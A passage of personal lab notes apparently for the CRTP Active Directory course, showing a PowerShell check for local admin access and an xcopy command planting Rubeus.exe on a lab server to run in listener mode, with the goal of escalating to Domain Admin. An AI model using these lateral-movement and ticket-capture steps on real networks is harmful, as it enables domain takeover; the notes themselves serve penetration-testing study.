italianpenty/appunti/LAB/CRTP no C2.md

 Find-PSRemotingLocalAdminAccess
 ```
 ![[Pasted image 20231025162212.png]]

-*Compromise the server and escalate to Domain Admin privileges*
 Use rubeus on the server to run on listener mode
 ```powershell
 echo F | xcopy C:\AD\Tools\Rubeus.exe \\dcorp-appsrv\C$\Users\Public\Rubeus.exe /Y